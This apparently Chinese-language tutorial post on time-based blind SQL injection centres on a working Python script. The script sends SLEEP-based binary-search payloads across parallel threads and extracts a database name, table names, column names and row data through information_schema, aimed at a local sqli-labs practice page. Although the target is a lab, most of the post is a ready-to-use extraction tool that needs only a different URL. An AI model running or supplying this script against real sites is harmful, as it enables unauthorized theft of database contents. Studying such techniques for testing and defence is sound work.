时间盲注(Time-Based Blind SQL Injection)是一种SQL注入技术,攻击者通过观察数据库响应时间的差异来推断数据库中的信息。以下是时间盲注中常用的函数和步骤,用于获取表名、列名和具体数据
下面是二分算法进行查找:
import requests
import concurrent.futures
import time
def binary_search_character(url, query, index, low=32, high=128):
while low < high:
mid = (low + high + 1) // 2
payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
response_time = time.time() - start_time
if response_time > 1.5:
low = mid
else:
high = mid - 1
return chr(low) if low > 32 else ''
时间盲注的原理
SLEEP(2)
: 如果条件为真,服务器会延迟 2 秒响应。- 通过
time.time()
计算请求的响应时间,判断是否触发了SLEEP()
。 - 逐字符采用二分法减少请求次数,提高提取效率。
def extract_data(url, query, max_length=200):
extracted_data = [''] * max_length
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
future_to_index = {executor.submit(binary_search_character, url, query, i): i for i in range(1, max_length + 1)}
for future in concurrent.futures.as_completed(future_to_index):
index = future_to_index[future]
try:
result = future.result()
if result:
extracted_data[index - 1] = result
print(f": {''.join(extracted_data).strip()}")
except Exception as exc:
print(f"Error extracting character {index}: {exc}")
return ''.join(extracted_data).strip()
if __name__ == '__main__':
url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
database_name = extract_data(url, "SELECT database()")
print(f"数据库名: {database_name}")
table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
table_names = extract_data(url, table_name_query)
print(f"表名: {table_names}")
table_name = table_names.split(',')[0]
column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
column_names = extract_data(url, column_name_query)
print(f"列名: {column_names}")
column_name = column_names.split(',')[1]
data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
extracted_values = extract_data(url, data_query)
print(f"数据: {extracted_values}")